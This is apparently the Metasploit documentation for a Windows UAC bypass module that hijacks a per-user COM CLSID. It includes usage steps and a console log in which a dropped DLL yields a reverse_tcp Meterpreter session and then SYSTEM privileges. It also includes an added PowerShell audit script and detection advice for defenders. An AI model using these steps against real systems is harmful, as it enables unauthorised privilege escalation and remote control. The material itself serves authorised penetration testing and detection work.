Bypassuac Comhijack

documentation/modules/exploit/windows/local/bypassuac_comhijack.md


Introduction

This module will bypass UAC on Windows 7 through to 10 RS3 by hijacking a COM Class ID that is located in the current user hive. This key contains a reference to a DLL that contains a chosen payload. Multiple COM vectors are defined in this module and one is chosen at random at runtime.

The module modifies the registry in order for this exploit to work. The modification is reverted once the exploitation attempt has finished.

This module requires that the payload architecture match the target operating system architecture, because the system binaries the module invokes are native to that architecture.

If a custom DLL is to be used with EXE::Custom, that DLL must match the system architecture, and should call ExitProcess() after starting the payload in a different process.
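The footprint this technique leaves while it runs is a key under HKCU\Software\Classes\CLSID whose server entry points at a DLL in a user-writable directory, such as the %TEMP% path shown in the scenario below. The following PowerShell audit script is an added example for defenders and is not part of the Metasploit module or its documentation: it walks the current user's CLSID hive and reports any InprocServer32 or LocalServer32 entry that resolves to a user-writable location, and also flags the Event Viewer CLSID named in this document. The function name, the list of user-writable directories and the choice to list only that one CLSID are assumptions made for illustration; the module itself defines additional vectors that are not enumerated on this page.

```powershell
# Added example (not the module's own code): audit HKCU COM class registrations
# for server binaries in user-writable locations. The directory list and the
# known-vector CLSID list are assumptions for illustration.

# CLSID this document shows being targeted (Event Viewer vector). The module
# picks from several vectors at random; only this one is named on the page.
$KnownVectorClsids = @(
    '{0A29FF9E-7F9C-4437-8B11-F424491E3931}'
)

# Locations an unprivileged user can write to. A per-user COM server living
# here is suspicious: legitimate servers are almost always registered
# machine-wide under HKLM and installed into Program Files or System32.
$UserWritablePatterns = @(
    [regex]::Escape($env:TEMP),
    [regex]::Escape($env:LOCALAPPDATA),
    [regex]::Escape($env:APPDATA),
    [regex]::Escape((Join-Path $env:USERPROFILE 'Downloads'))
)

function Get-SuspiciousHkcuComServers {
    [CmdletBinding()]
    param()

    $root = 'HKCU:\Software\Classes\CLSID'
    if (-not (Test-Path -Path $root)) { return @() }

    $findings = foreach ($clsidKey in Get-ChildItem -Path $root -ErrorAction SilentlyContinue) {
        # Check both in-process (DLL) and out-of-process (EXE) server entries
        foreach ($serverSub in 'InprocServer32', 'LocalServer32') {
            $serverKey = Join-Path -Path $clsidKey.PSPath -ChildPath $serverSub
            if (-not (Test-Path -Path $serverKey)) { continue }

            # The (default) value of the server subkey holds the binary path
            $serverPath = (Get-Item -Path $serverKey).GetValue('')
            if ([string]::IsNullOrWhiteSpace($serverPath)) { continue }

            # Expand %VAR% references and strip surrounding quotes before matching
            $expanded = [Environment]::ExpandEnvironmentVariables($serverPath).Trim('"')

            $inWritable = $false
            foreach ($pattern in $UserWritablePatterns) {
                if ($expanded -imatch $pattern) { $inWritable = $true; break }
            }
            $isKnownVector = $KnownVectorClsids -contains $clsidKey.PSChildName

            if ($inWritable -or $isKnownVector) {
                [pscustomobject]@{
                    Clsid          = $clsidKey.PSChildName
                    ServerType     = $serverSub
                    ServerPath     = $expanded
                    InUserWritable = $inWritable
                    KnownVector    = $isKnownVector
                    # False for a known vector means the DLL was already removed,
                    # which matches the module's cleanup behaviour
                    BinaryPresent  = Test-Path -LiteralPath $expanded
                }
            }
        }
    }
    return @($findings)
}

# Usage: run in the context of the user being audited, since the hive is per-user
Get-SuspiciousHkcuComServers | Format-Table -AutoSize
```

Because the module reverts its registry change once the attempt finishes, a point-in-time scan like this only catches an exploitation that is in progress or whose cleanup failed; the dropped DLL under %TEMP% (the warning at the end of the scenario) is the artifact that persists. For ongoing coverage, collect registry write events on HKCU\Software\Classes\CLSID (Sysmon event IDs 12 and 13 cover key creation and value writes) and alert when a CLSID subkey is created and then deleted within seconds by an unprivileged process.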

Usage

  1. Create a session on the target system under the context of a local administrative user.
  2. Begin interacting with the module: use exploit/windows/local/bypassuac_comhijack.
  3. Set the PAYLOAD and configure it correctly, making sure the architecture is correct.
  4. If an existing handler is configured to receive the elevated session, then the module's handler should be disabled: set DisablePayloadHandler true.
  5. Make sure that the SESSION value is set to the existing session identifier.
  6. Invoke the module: run.

Scenarios

msf exploit(bypassuac_comhijack) > sessions

Active sessions
===============

  Id  Type                     Information                           Connection
  --  ----                     -----------                           ----------
  1   meterpreter x64/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)

msf exploit(bypassuac_comhijack) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-5A73R51
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_AU
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(bypassuac_comhijack) > options

Module options (exploit/windows/local/bypassuac_comhijack):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     xxx.xx.255.1     yes       The listen address
   LPORT     8443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(bypassuac_comhijack) > run

[*] [2017.08.16-12:58:31] UAC is Enabled, checking level...
[+] [2017.08.16-12:58:31] Part of Administrators group! Continuing...
[+] [2017.08.16-12:58:32] UAC is set to Default
[+] [2017.08.16-12:58:32] BypassUAC can bypass this setting, continuing...
[*] [2017.08.16-12:58:33] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] [2017.08.16-12:58:33] Uploading payload to C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll ...
[*] [2017.08.16-12:58:33] Executing high integrity process ...
[*] [2017.08.16-12:58:34] Sending stage (1188415 bytes) to xxx.xx.255.159
[*] Meterpreter session 2 opened (xxx.xx.255.1:8443 -> xxx.xx.255.159:51480) at 2017-08-16 12:58:35 +1000
[*] [2017.08.16-12:58:38] Cleaining up registry ...
[!] [2017.08.16-12:58:39] This exploit may require manual cleanup of 'C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll' on the target
msf exploit(bypassuac_comhijack) > sessions

Active sessions
===============

  Id  Type                     Information                           Connection
  --  ----                     -----------                           ----------
  1   meterpreter x64/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)
  2   meterpreter x64/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  xxx.xx.255.1:8443 -> xxx.xx.255.159:51480 (xxx.xx.255.159)

msf exploit(bypassuac_comhijack) > sessions -1
[*] Starting interaction with 2...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM